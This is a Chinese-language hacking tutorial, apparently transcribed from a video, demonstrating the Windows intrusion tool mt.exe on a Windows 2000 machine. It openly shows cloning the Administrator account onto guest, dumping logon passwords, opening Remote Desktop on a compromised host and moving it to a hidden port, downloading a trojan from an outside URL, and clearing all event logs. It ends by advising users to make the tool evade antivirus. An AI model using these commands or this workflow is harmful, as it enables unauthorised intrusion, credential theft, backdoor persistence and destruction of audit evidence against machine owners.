MT的详细用法

用法: mt.exe <选项>
选项 :
-filter ---更改 TCP/IP 过滤器的开头状态
-addport ---添加端口到过滤器的允许列表
-setport ---设置端口作为过滤器的允许列表
-nicinfo ---列出 TCP/IP 界面信息
-pslist ---列出活动进程
-pskill ---杀毒指定进程
-dlllist ---列出指定进程的 DLL
-sysinfo ---列出系统信息
-shutdown ---关闭系统
-reboot ---重启系统
-poweroff ---关闭电源
-logoff ---注销当前用户会话
-chkts ---检查终端服务信息
-setupts ---安装终端服务
-remts ---卸载终端服务
-chgtsp ---重置终端服务端口
-clog ---清除系统日志
-enumsrv ---列出所有服务
-querysrv ---列出指定服务的详细信息
-instsrv ---安装一个服务
-cfgsrv ---更改服务配置
-remsrv ---卸载指定服务
-startsrv ---启动指定服务
-stopsrv ---停止指定服务
-netget ---从 http/ftp 下载
-redirect ---端口重定向
-chkuser ---列出所有账户、sid 和 anti 克隆
-clone ---克隆 admin 到目标
-never ---设置账户看上去从未登录
-killuser ---删除账户，甚至是 "guest" 也可删除
-su ---以 Local_System 权限运行进程
-findpass ---显示所有已登录用户的口令
-netstat ---列出 TCP 连接
-killtcp ---杀死 TCP 连接
-psport ---映射端口到进程
-touch ---设置文件日期和时间到指定值
-secdel ---安全擦除文件或目录占用的空间
-regshell ---进入一个控制台注册表编辑器
-chkdll ---检测 gina dll 后门

1.mt -sysinfo 查看机器配置

先来看一下..看到没??这里就会列举出来本机的各种配置信息....看下面.这里面列举了现在系统打过的补丁,这里显示了本机硬件的配置..CPU等..这里显示了本机IP地址,子网,和网关...

2.type c:\boot.in 查看启动文件
这主要是调 用了c:\boot.i 这个文件,就是开机的双启动菜单,通过它来查看本机用的是什么系统.这里多说一个.. VER功能和它也是一样的.它是系统命令..

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINNT
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINNT="Microsoft Windows 2000 Server" /fastd
etect

C:\>ver

Microsoft Windows 2000 [Version 5.00.2195]

看到了吧?2000的系统..

3.mt -clone Administrator guest 意思是把guest克隆为管理员（必需是系统权

限才能运行）

4.mt -chkuser 查看自己机器里是否有克隆的帐户
用它也可以来查看自己的机器是否被人克隆了帐户..
看到了吧..

5.mt -findpass 查看管理员密码（仅2000/2003）
这个功能和一个findpass的功能是一样的.

C:\>mt -findpass

The logon information :
Domain : 77AFCF2E775047B
Username : Administrator
Password : 123

看到了吧?我系统的密码就是123

6.mt -pslist 查看进程
此功能是在DOS下显示主机现在正在运行的程序.如果是在XP下
我们就可以直接用tasklist 就可以了...担在2000下不技术
就这样子..看到了吧?
再试个..
关它..

7.mt -pskill 杀除进程

些功能就是杀掉某个进程,这里我们可以试一下.
现在我们来关掉932这个进程..
C:\>mt -pskill 772

Kill process sccuessful!

已经关掉了..

8.mt -setupts 安装终端服务（仅2000/2003好用）
这里说明下,我们平时我们在入侵2000的机器时有时开不了3389,那是因为只有2000服务器版的系统才能开3389,如果不是服务器版的,是开不了3389的,这也是有很多人不问为什么就一直开3389而打不开的原因..
我虚拟机不是服务器的,所以打不开..就是这意思..

9.mt -chgtsp 1030 改终端端口
当我们开了对方机子3389后,主人很容易会发现开放,那我们可以把3389的端口给改这样只有我们自己去用它...
1030 这个改成你想要的端口..

10.mt -reboot 重启
不带有任何提示,直接重启....一会我试下..

11.mt -netget http://或者ftp://www.你木马的地址 c:\1.exe 下载木马

功能和vget是一样的,我们来试下..

Fail to open registy key...
C:\>mt -netget http://user.free2.77169.net/didiaoyin/mm.exe c:\mm.exe

Download File from http://user.free2.77169.net/didiaoyin/mm.exe to c:\
Download completed 290817 bytes ......
Downloaded 284.0KB @94.7KB/S in 2sec.

File <c:\mm.exe> TotalByte : 284 KB.
看到了吧?现在来看一下..我的鸽子...

12.mt -clog all 删除所有应用程序，系统，日志等

这个都明白吧...
C:\>mt -clog all
Clean EventLog : Application successful!
Clean EventLog : Security successful!
Clean EventLog : System successful!

这样就把日志都删除了...

13.mt -dlllist 列出进程DLL

格式是mt -dlllist 进程号

这样就可以把对应进程号的进程显示出所有的DLL文件

这个在我们查马时很有用..

此功能目的是列出进程的DLL文件,我们来看下..

14.mt -poweroff 关掉电源。
没什么好说的,直接关机..

15.mt -logoff 注销
直接注销.

16.mt -shutdown 关机(都不会有任何提示)

关机..

17.mt -chkts 检查终端信息

没有.
18.mt -remts 卸载终端服务

这个就和刚才的那个8.mt -setupts 是对应的,卸载终端...

好了,MT的基本用法就这么多,功能还是很多的...担是现在杀软都杀它..我们要自己做免杀...
现在来试下mt -logoff 这个吧,注销,看下效果..关机也是一样的..